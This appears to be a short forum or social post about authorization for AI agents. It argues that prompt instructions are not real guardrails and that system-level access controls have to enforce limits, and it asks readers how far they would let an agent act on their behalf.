Authorization feels like one of the trickiest parts of building AI agents that actually do real work.
Without it, they’re smart—but stuck on the sidelines. They can draft a reply, but you’re still the one logging in, clicking buttons, and shuffling files between apps.
With authorization, agents become much more useful — but also much riskier.
Once an agent can hop into your browser session, call APIs, or send emails, the question shifts. It’s not “Is this model smart?” anymore. It’s “What’s it actually allowed to touch? with what credentials?”
And here’s the thing: you can’t rely on prompts to keep things safe. Telling an agent “don’t open this folder” or “don’t send anything without checking first” isn’t a guardrail—it’s a wish. If something shouldn’t be accessible, the system itself needs to enforce that.
Curious where people draw the line:
how far would you actually let an agent go on your behalf?
Feels like too little authorization makes agents glorified chatbots, but too much makes them hard to trust.